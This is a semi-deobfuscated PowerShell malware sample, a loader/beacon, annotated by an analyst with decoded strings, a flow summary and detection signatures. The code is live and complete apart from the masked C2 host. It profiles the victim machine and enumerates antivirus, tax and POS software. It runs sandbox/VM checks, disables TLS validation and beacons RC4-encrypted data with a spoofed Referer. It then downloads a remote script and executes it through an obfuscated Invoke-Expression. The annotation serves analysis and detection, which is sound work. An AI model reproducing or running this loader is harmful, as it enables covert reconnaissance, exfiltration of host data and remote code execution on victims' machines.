# Semi-deobfuscated PowerShell from malware analysis
# Analyst notes (whole sample):
# A loader/beacon. Everything is wrapped in one function so that the helper
# functions and the $ag state hashtable are private to it; the helpers read
# $ag through PowerShell's dynamic (parent) scope. Strings are hidden with
# -f format-string reordering, .Replace() of three-character markers and
# [char] arithmetic; the decoded value is noted next to each site below.
# Flow (the driver is at the bottom of this function):
#   1. build the config hashtable, disable TLS certificate validation,
#      silence errors
#   2. POST "gata=" + RC4/Base64 of "act=pall|p=<0|1>|ver=p.1.0.9|pcn=<PS major>"
#      to a randomised path under $ag.srv, with a Cookie of "routed:<host id>"
#   3. if the decrypted reply ends in "0", POST a second beacon carrying a full
#      host profile ("act=fall|...") and use that reply instead
#   4. split the reply into a script and a trailing 32-char key, IEX the
#      script (IEX is spelled by indexing $env:COMSPEC), then call a function
#      that is not defined in this sample and so presumably comes from it
# Detection opportunities visible here: Set-Alias to Get-Random, a
# ServerCertificateValidationCallback of {$true}, a WMI SecurityCenter2
# AntiVirusProduct query followed by an outbound POST, and a command name
# assembled from $env:COMSPEC characters.
function sdnfjshdklfhlj {
# Loader configuration. Keys are looked up by obfuscated name elsewhere.
$ag = @{
# decodes to "http://YYY.YY.YYY.YYY" (C2 host, already masked by the analyst)
srv = ("{3}{1}{0}{2}{4}{5}"-f '.','//YYY','Y','http:','Y.YYY','.YYY');
# 32-byte RC4 key shared by Encrypt/Decrypt
skkey = 'b[CgNFd8=sSQ{YsBcX6|PJ+A~w?#LEKH';
# decodes to an Opera-style User-Agent:
# "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko); OPR/43.0.2441.1144; Chrome/64.0.3282.119; Safari/537.36"
# The stray "; " after "Gecko)" and the odd OPR build number are a usable signature.
usag = (("{3}{9}{12}{14}{0}{18}{11}{7}{5}{16}{20}{23}{1}{8}{19}{6}{10}{22}{15}{2}{4}{21}{13}{17}"-f 'NT 6.1;','o); OPR/4','.0.3282.1','Mozilla/5','19; ','WebKit/5','44; Ch','ple','3.','.0 (Wi','rome','; x64) Ap','ndow','5','s ','64','37.36','37.36',' Win64','0.2441.11',' (KHTML, like ','Safari/','/','Geck'));
# decodes to "application/xml"
conType = ("{1}{0}{4}{2}{3}"-f 'pl','ap','ion/x','ml','icat')
# decodes to "https://www.update.microsoft.com/docs.aspx" (spoofed Referer)
reffer = ("{9}{2}{4}{7}{3}{8}{0}{10}{11}{5}{6}{12}{1}"-f 'oft','x','/www.u','i','pdate','/d','oc','.m','cros','https:/','.','com','s.asp');
encutf = [System.Text.Encoding]::UTF8;
# decodes to "gata=" (POST body prefix)
pref = ("{0}{1}"-f'g','ata=');
# decodes to "p.1.0.9" (implant version string sent in every beacon)
ver = ("{1}{2}{0}" -f '0.9','p.','1.')
}
# "System.Security" and "System.Core"
$Null = [Reflection.Assembly]::LoadWithPartialName(("{0}{1}{2}" -f 'System','.Sec','urity'));
$Null = [Reflection.Assembly]::LoadWithPartialName(("{0}{2}{1}" -f'Sy','.Core','stem'));
# "SilentlyContinue": every later failure is swallowed, including the
# -ErrorAction Stop calls in IsVirtual that are inside no try block.
$ErrorActionPreference = ("{3}{1}{2}{0}"-f'nue','ent','lyConti','Sil');
# Returns $true when the current token is in the local Administrators role.
function Test-Administrator
{
$user = [Security.Principal.WindowsIdentity]::GetCurrent();
(New-Object Security.Principal.WindowsPrincipal $user).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)
}
# Enumerates installed software via the Uninstall registry keys (native and
# Wow6432Node) and emits "<DisplayName>;" for every name matching $NameRegex.
# The default regex targets browsers, tax/accounting software, security
# products and POS software. Not called anywhere in this sample; the
# downloaded script may use it.
function Get-Soft {
param (
[Parameter(ValueFromPipeline=$true)]
[string[]]$ComputerName = $env:COMPUTERNAME,
# NameRegex = (Opera|Firefox|Chrome|TAX|OLT|LACERTE|PROSERIES|Virus|Firewall|Defender|Secury|Anti|Comodo|Kasper|Protect|Point of Sale|POS)
# "XRg" is a placeholder for "|" ([char]88+82+103 -> "XRg", [char]124 -> "|").
[string]$NameRegex = ((("{13}{5}{7}{30}{16}{4}{18}{10}{8}{26}{11}{21}{24}{6}{23}{2}{3}{19}{20}{1}{14}{29}{0}{12}{28}{15}{22}{27}{25}{17}{9}"-f'do','ntiX','RgSec','ury','LACERTEXRgPROSERIES','RgFire','nde','foxXRgChr','XR','OS)','us','ire','XRgKasperXRgProtec','(OperaX','Rg',' of ','XRgTAXXRgOLTXRg','gP','XRgVir','X','RgA','wallXRg','Sale','rX','Defe','R','gF','X','tXRgPoint','Como','ome')).REpLace(([ChAR]88+[ChAR]82+[ChAR]103),[StRING][ChAR]124))
)
foreach ($comp in $ComputerName) {
# $keys = '' and "\Wow6432Node" ([char]92 is the backslash)
$keys = '',((("{2}{3}{4}{1}{0}" -f 'Node','32','{0','}','Wow64')) -f [CHAr]92)
foreach ($key in $keys) {
try {
# "LocalMachine" -> HKLM:\SOFTWARE$key\Microsoft\Windows\CurrentVersion\Uninstall
$apps = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey(("{0}{1}{2}" -f 'LocalMa','c','hine'),$comp).OpenSubKey("SOFTWARE$key\Microsoft\Windows\CurrentVersion\Uninstall").GetSubKeyNames()
} catch {
continue
}
foreach ($app in $apps) {
$program = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey(("{1}{0}{2}" -f'alMac','Loc','hine'),$comp).OpenSubKey("SOFTWARE$key\Microsoft\Windows\CurrentVersion\Uninstall\$app")
# "DisplayName"
$name = $program.GetValue(("{0}{2}{1}" -f'Displ','ame','ayN'))
$str = ''
if ($name -and $name -match $NameRegex) {
$str += $name + ';'
$str
}
}
}
}
}
# Lists registered AV products as "name;name;..." (trailing ';' stripped) by
# querying root\SecurityCenter2 AntiVirusProduct; "N/A" when none or on error.
# Recon of security tooling is the point here; the WMI query itself is a
# useful detection anchor when followed by network activity.
function Get-AV {
try {
# namespace decodes to "rootMlVSecurityCenter2" with "MlV" -> "\"
Get-WmiObject -Namespace ((("{3}{0}{4}{1}{5}{2}"-f 'ootM','Se','yCenter2','r','lV','curit')).REPLace(([Char]77+[Char]108+[Char]86),[STRing][Char]92)) -Class AntiVirusProduct -ComputerName $env:computername | % { $e += $_.displayName + ';'}
if ($e){
$e[0..($e.Length-2)]-join''
}else{
"N/A"
}
} catch {
"N/A"
} finally {
[GC]::Collect()
}
}
# CPU model names joined with ';' from root\CIMV2 Win32_Processor, "N/A" on error.
function Get-CPU {
try {
# namespace decodes to "rootxarCIMV2" with "xar" -> "\"
Get-WmiObject -Namespace ((("{2}{0}{1}" -f'rCI','MV2','rootxa')).rEPLacE('xar',[STrING][cHAr]92)) -Class Win32_Processor -ComputerName $env:computername | % { $e += $_.Name + ';'}
$e[0..($e.Length-2)]-join''
}
catch {"N/A"}
finally{[GC]::Collect()}
}
# Stable host identifier: lowercase hex MD5 of
# lower(UserName + MachineName + BIOS SerialNumber). Sent in the Cookie
# header (see the driver) so the C2 can track the victim.
function SysMachineID {
$HashName = "MD5"
[string]$ret = ""
$hd = gwmi win32_bios
# "SerialNumber"
$ret = $hd[("{2}{1}{0}"-f 'umber','rialN','Se')].ToString()
[string]$String = $([Environment]::UserName +[Environment]::MachineName + $ret).ToLower();
$StringBuilder = New-Object System.Text.StringBuilder
[System.Security.Cryptography.HashAlgorithm]::Create($HashName).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($String))|%{
[Void]$StringBuilder.Append($_.ToString("x2"))
}
$StringBuilder.ToString().ToLower()
}
# Joins the values of a hashtable with ';' (keys are dropped). The order is
# whatever the hashtable enumerates in, so the field order is not fixed.
function HasGet-Bretring($ht) {
$first = $true
foreach($pair in $ht.GetEnumerator()) {
if ($first) {
$first = $false
} else {
$output += ';'
}
$output+="{0}" -f $($pair.Value)
}
$output
}
# One Name/IP/MAC/ID record per network adapter whose NetConnectionStatus is
# 2 (connected); IP comes from the related Win32_NetworkAdapterConfiguration.
function Get-workconfig {
# filter decodes to "NetConnectionStatus=2"
Get-WmiObject Win32_NetworkAdapter -Filter ("{5}{3}{4}{0}{6}{2}{1}" -f 'nSt','2','tus=','Connec','tio','Net','a') |
ForEach-Object {
$result = 1 | Select-Object Name, IP, MAC, ID
$result.Name = $_.Name
$result.MAC = $_.MacAddress
$result.ID = $_.DeviceID
# "Win32_NetworkAdapterConfiguration"
$config = $_.GetRelated(("{5}{6}{3}{7}{0}{2}{1}{4}"-f'a','C','pter','et','onfiguration','Wi','n32_N','workAd'))
$result.IP = $config | Select-Object -expand IPAddress
$result
}
}
# Builds the host-profile record for the second beacon. Fields are
# '|'-separated: domain|user|machine|<adapter records>|OS caption|admin flag|
# WxH|process name|pid|PS major|OS arch|time zone|uptime|CPU|ver|RAM GB|AV|
# IsVirtual; at the end each field is rewrapped as "inf=<field>|" and the
# final '|' is stripped.
function SysMachineinfo {
$str = [Environment]::UserDomainName+'|'+[Environment]::UserName+'|'+[Environment]::MachineName;
$string = ""
foreach($c in Get-workconfig) {
[string]$lanname = $c.Name; [string]$macadr = $c.MAC; [string]$ID = $c.ID
# Dead assignment: $p is never defined and the next line overwrites $ip.
$ip = @{$true=$c.IP[0];$false=$p.IP}[$c.IP.Length -lt 6];
[string]$ip = $c.IP[0];
if(!$ip -or $ip.trim() -eq '') {
# "0.0.0.0"
$ip=("{2}{0}{1}" -f '0','.0','0.0.')
};
# joined below as id;ip;mac;name in hashtable enumeration order
$lanconf = @{
id = $ID
ip = $ip;
mac = $macadr;
name = $lanname;
}
$string += HasGet-Bretring $lanconf
}
$str += "|$string";
$str += '|' + $(Get-WmiObject -class Win32_OperatingSystem).Caption
# running as "system": append "|True" ("3Gy" -> "|") without the role check
if(([Environment]::UserName).ToLower() -eq ("{0}{1}"-f'syste','m')) {
$str += (('3GyTrue') -replACe'3Gy',[ChAR]124)
} else {
$str += '|'+ $(Test-Administrator)
}
# "System.Windows.Forms", loaded only to read screen geometry
[void] [Reflection.Assembly]::LoadWithPartialName(("{2}{4}{3}{5}{1}{0}" -f'ws.Forms','ndo','S','m.W','yste','i'))
$Screens = [system.windows.forms.screen]::AllScreens
# only the last enumerated screen's size survives the loop
foreach ($Screen in $Screens) {
$Width = $Screen.Bounds.Width
$Height = $Screen.Bounds.Height
}
# `x is not an escape, so this renders as e.g. "1920x1080"
$str += '|' + "$Width`x$Height"
$n = [System.Diagnostics.Process]::GetCurrentProcess()
$str += '|'+ $n.ProcessName+'|'+$n.Id
$str += '|' + $PSVersionTable.PSVersion.Major
$str += '|' + (Get-WmiObject -class Win32_OperatingSystem).OSArchitecture
$str += '|' + (gwmi win32_timeZone -ComputerName $env:ComputerName).caption
$str += '|' + $(Get-SystemUptime)
$str += '|' + $(Get-CPU)
$str += '|' + $ag['ver']
$str += '|' + ([Math]::Round((Get-WmiObject -Class win32_computersystem).TotalPhysicalMemory/1Gb)).toString()
$str += '|' + $(Get-AV)
$str += '|' + $(IsVirtual)
# rewrap every field as "inf=<field>|", then drop the trailing '|'
$str.split('|') |% {$e += "inf=$_|"}
$e[0..($e.Length-2)]-join''
}
# Uptime since LastBootUpTime as "<d>d:<h>h:<m>m:<s>s".
function Get-SystemUptime {
$lastboot = [System.Management.ManagementDateTimeconverter]::ToDateTime("$((gwmi Win32_OperatingSystem).LastBootUpTime) ")
$uptime = (Get-Date) - $lastboot
return (($uptime.days).ToString()+"d:"+($uptime.hours).ToString()+"h:"+$uptime.minutes.ToString()+"m:"+($uptime.seconds).ToString()+"s")
}
# Sandbox/VM check from BIOS serial/version and ComputerSystem
# manufacturer/model; returns only the boolean. $computer is never set and
# $results is built but never read. The decoded labels are noted per branch.
Function IsVirtual
{
$wmibios = Get-WmiObject Win32_BIOS -ErrorAction Stop | Select-Object version,serialnumber
$wmisystem = Get-WmiObject Win32_ComputerSystem -ErrorAction Stop | Select-Object model,manufacturer
$ResultProps = @{
ComputerName = $computer
BIOSVersion = $wmibios.Version
SerialNumber = $wmibios.serialnumber
Manufacturer = $wmisystem.manufacturer
Model = $wmisystem.model
IsVirtual = $false
VirtualType = $null
}
# serial -like "*VMware*" -> "Virtual - VMWare"
if ($wmibios.SerialNumber -like ("{1}{0}"-f 'VMware*','*')) {
$ResultProps.IsVirtual = $true
$ResultProps.VirtualType = ("{0}{2}{3}{4}{1}"-f'Virt','Ware','ual ','- V','M')
}
else {
switch -wildcard ($wmibios.Version) {
# "VIRTUAL" -> "Virtual - Hyper-V"
("{1}{0}" -f 'TUAL','VIR') {
$ResultProps.IsVirtual = $true
$ResultProps.VirtualType = ("{1}{3}{4}{0}{2}"-f ' - Hy','Vi','per-V','rtua','l')
}
# "A M I" -> "Virtual - Virtual PC"
("{0}{1}"-f 'A',' M I') {
$ResultProps.IsVirtual = $true
$ResultProps.VirtualType = ("{1}{2}{6}{5}{3}{0}{4}"-f'ual ','Virt','ua','rt','PC',' - Vi','l')
}
# "*Xen*" -> "Virtual - Xen"
("{1}{0}"-f'*','*Xen') {
$ResultProps.IsVirtual = $true
$ResultProps.VirtualType = ("{1}{3}{2}{0}"-f'al - Xen','Vi','tu','r')
}
}
}
if (-not $ResultProps.IsVirtual) {
# manufacturer "*Microsoft*" -> "Virtual - Hyper-V"
if ($wmisystem.manufacturer -like ("{2}{1}{0}"-f't*','osof','*Micr'))
{
$ResultProps.IsVirtual = $true
$ResultProps.VirtualType = ("{1}{0}{2}{3}" -f ' - Hy','Virtual','p','er-V')
}
# manufacturer "*VMWare*" -> "Virtual - VMWare"
elseif ($wmisystem.manufacturer -like ("{1}{0}{2}" -f 'ar','*VMW','e*'))
{
$ResultProps.IsVirtual = $true
$ResultProps.VirtualType = ("{3}{2}{0}{1}" -f 'l - VMW','are','rtua','Vi')
}
# model "*Virtual*" -> "Unknown Virtual Machine"
elseif ($wmisystem.model -like ("{2}{1}{0}"-f'ual*','irt','*V')) {
$ResultProps.IsVirtual = $true
$ResultProps.VirtualType = ("{1}{3}{4}{0}{2}"-f 'ch','Unknown Virtu','ine','al ','Ma')
}
}
$results += New-Object PsObject -Property $ResultProps
return $ResultProps.IsVirtual
}
# C2 transport. POSTs $args[0] (UTF-8) to a random path under $ag.srv and
# returns the response body; on any failure it returns the exception message
# instead, which the caller then feeds to Decrypt. Certificate validation is
# disabled for the whole process, the system proxy and its default
# credentials are used, and the timeout is 600000 ms (10 minutes).
function vzuhdata{
# encutf
$buffer = $ag[("{1}{0}" -f'cutf','en')].GetBytes($args[0])
try {
[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};
[SysTEm.Net.SeRvICePoIntMAnaGEr]::Expect100ConTINuE=0;
# http://YYY.YY.YYY.YYY/ltjzhcbutq/ozxvgzfxkvm/vcubhhhqmtefvdjywrrylhqmxh.php
# $u aliases Get-Random as "er" and yields a random lowercase word of 7..36
# letters; the URL is srv/<word>/<word>/<word>.<php|jsp|asp>, so the path
# is different on every beacon and only the host is a stable indicator.
$urr = $($ag['srv'] + '/' + $($u={sal er Get-Random;$(-join(1..$(er -Minimum 7 -Maximum 37)|%{[char][int]((65..90)+(97..122)|er)})).ToLower()};'{0}/{1}/{2}.{3}' -f $(. $u), $(. $u), $(. $u), $(@('php','jsp','asp')| Get-Random)))
[System.Net.HttpWebRequest] $webRequest = [System.Net.WebRequest]::Create($urr)
$webRequest.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$webRequest.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
$webRequest.Timeout = 600000;
# "POST"
$webRequest.Method = ("{0}{1}"-f 'POS','T')
# User-Agent = $ag.usag
$webRequest.UserAgent = $ag[("{1}{0}"-f 'ag','us')]
# "Cookie" = $ag.seid ("routed:<encrypted host id>", set in the driver)
$webRequest.Headers.Add(("{1}{0}"-f 'okie','Co'), $ag[("{1}{0}" -f 'id','se')])
# Content-Type = $ag.conType ("application/xml")
$webRequest.ContentType = $ag[("{1}{2}{0}" -f'pe','co','nTy')]
# Referer = $ag.reffer (spoofed microsoft.com URL)
$webRequest.Referer = $ag[("{1}{0}" -f'effer','r')]
$webRequest.ContentLength = $buffer.Length
$requestStream = $webRequest.GetRequestStream()
$requestStream.Write($buffer, 0, $buffer.Length)
$requestStream.Flush()
$requestStream.Close()
[System.Net.HttpWebResponse] $webResponse = $webRequest.GetResponse()
$streamReader = New-Object System.IO.StreamReader($webResponse.GetResponseStream())
$result = $streamReader.ReadToEnd()
$webResponse.Close()
$result
} catch {
$_.Exception.Message
}
}
# External IP lookup: fetches https://ipinfo.info/html/ip_checker.php with an
# IE6 User-Agent and returns every dotted-quad found in the page. Not called
# anywhere in this sample.
function getexteip {
[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};
[SysTEm.Net.SeRvICePoIntMAnaGEr]::Expect100ConTINuE=0;
$Wc=New-ObJeCt SYsTEM.NET.WeBCliENt;
# decodes to "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)"
$u=("{3}{17}{6}{12}{7}{8}{5}{15}{11}{18}{14}{0}{4}{13}{16}{19}{1}{9}{2}{10}" -f ' ','nfoPa','1','Mozill','S','0; Wind','/4.0 (',' M','SIE 6.','th.',')',' ','compatible;','V1;',' 5.1;','ows',' ','a','NT','I');
# "User-Agent"
$Wc.HeADeRS.AdD(("{0}{2}{1}" -f 'Use','nt','r-Age'),$u);
$Wc.Proxy=[SYSTem.NEt.WEBREQUeSt]::DefAulTWebPRoXY;
$WC.PRoXy.CReDEntIALs=[SYsTEM.NET.CReDentIAlCAcHe]::DefaUlTNetwoRKCREdENTIalS;
# "https://ipinfo.info/html/ip_checker.php"
$rr = $Wc.DoWnloaDSTRIng(("{2}{1}{5}{0}{6}{3}{4}"-f'info/h','ttp','h','chec','ker.php','s://ipinfo.','tml/ip_'));
$regex = [regex]'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}'; $($regex.Matches($rr)).value
}
# Textbook RC4: key-scheduling over a 256-byte state with the key repeated to
# 256 bytes, then the keystream XORed over a copy of $data. Same routine
# encrypts and decrypts. RC4 with a static key gives no real confidentiality
# against anyone holding this sample, which is what makes the traffic
# decodable for analysis.
function rc4 {
param([Byte[]]$data,[Byte[]]$key)
[Byte[]]$buffer = New-Object Byte[] $data.Length;$data.CopyTo($buffer, 0);[Byte[]]$s = New-Object Byte[] 256;[Byte[]]$k = New-Object Byte[] 256;
for ($i = 0; $i -lt 256; $i++){$s[$i] = [Byte]$i;$k[$i] = $key[$i % $key.Length];}
$j = 0;for ($i = 0; $i -lt 256; $i++){$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;};$i = $j = 0;
for ($x = 0; $x -lt $buffer.Length; $x++){$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;[int]$t = ($s[$i] + $s[$j]) % 256;$buffer[$x] = $buffer[$x] -bxor $s[$t];}
return $buffer
}
# Base64( RC4( UTF8(data), UTF8($ag.skkey) ) )
function Encrypt {
param([string]$data)
[Convert]::ToBase64String($(rc4 $ag[("{1}{0}" -f 'f','encut')].GetBytes($data) $ag[("{1}{0}" -f'cutf','en')].GetBytes($ag[("{1}{0}"-f 'kkey','s')])))
}
# UTF8( RC4( Base64Decode(data), UTF8($ag.skkey) ) ) - inverse of Encrypt
function Decrypt {
param([string]$data)
$ag[("{1}{2}{0}"-f'f','e','ncut')].GetString($(rc4 $([System.Convert]::FromBase64String($data)) $ag[("{0}{1}"-f 'enc','utf')].GetBytes($ag[("{0}{1}"-f 'skk','ey')])))
}
# Splits a decrypted reply laid out as <script><32-char key><1 status char>:
# $ag.skey = the 32 characters before the last one, $ag.scr = everything
# before them. Only scr is used below; skey is presumably for the downloaded
# script, which is not in this sample.
function get-construct {
param([string]$out)
# "skey"
$ag.add(("{0}{1}"-f'ske','y'), $($out[($out.length-33)..($out.length-2)]-join ''))
$ag.add('scr', $($out[0..($out.length-34)]-join ''))
}
# seid, routed
# Driver. Cookie value: "routed:" + Encrypt(host id).
$ag.add(("{0}{1}"-f'sei','d'), ("{1}{0}{2}"-f 'out','r','ed:') + $(Encrypt $(SysMachineID)));
if (Test-Administrator) {
$eb='p=1'
} else {
$eb='p=0'
}
# First beacon. Body = "gata=" + Encrypt("act=pall|p=<0|1>|ver=p.1.0.9|pcn=<PS major>")
# ("act=pall{0}" -F "|", "HDYver=" with "HDY" -> "|", "Oaopcn=" with "Oao" -> "|").
$de = Decrypt $(vzuhdata $($($ag[("{0}{1}"-f'p','ref')] + $(Encrypt $(((("{1}{0}{2}"-f'a','act=p','ll{0}')) -F [CHAr]124)+ $eb + ((("{2}{1}{0}" -f'r=','e','HDYv')).REpLACe('HDY','|'))+ $ag['ver'] + ((("{1}{0}"-f'aopcn=','O')).rePLACe('Oao',[strInG][cHar]124)) + $PSVersionTable.PSVersion.Major)))))
# $k is the last character of the reply as a string; "0" means "send the
# full profile first", anything else means the reply already carries the payload.
$k=$de[$de.length-1] -join ''
if ($k -eq 0) {
# Second beacon: "act=fall|" ("Kik" -> "|") + SysMachineinfo record.
get-construct $(Decrypt $(vzuhdata $($ag[("{0}{1}" -f'pr','ef')] + $(Encrypt $(((("{0}{1}{2}"-f'act','=fallK','ik')) -RePLaCE ([CHAR]75+[CHAR]105+[CHAR]107),[CHAR]124)+ $(SysMachineinfo))))))
} else {
get-construct $de
}
# $env:COMSPEC ("C:\WINDOWS\system32\cmd.exe") characters 4,26,25 spell "Iex";
# this dot-sources Invoke-Expression on the downloaded script, so it runs in
# this function's scope and can see $ag. Building a command name from
# environment-variable characters is a strong static/behavioural signature.
. ($eNV:coMsPec[4,26,25]-JoIN'') $ag['scr'];
# Scrub the script, key material and version from memory, then hand $ag to a
# function this sample never defines (presumably defined by the IEX'd script).
$de=$null;
$ag.Remove('scr');
$ag.Remove(("{0}{1}" -f 'p','ref'));
$ag.Remove(("{1}{0}" -f 'key','sk'));
$ag.Remove('ver');
$ag.Remove(("{0}{1}" -f 'encut','f'))
$Error.Clear()
[GC]::Collect()
[GC]::WaitForPendingFinalizers()
Get-federerfegegfeg $ag
}
# Entry point of the sample: everything else is scoped inside the wrapper
# function, so this one call is all the top-level script does.
& sdnfjshdklfhlj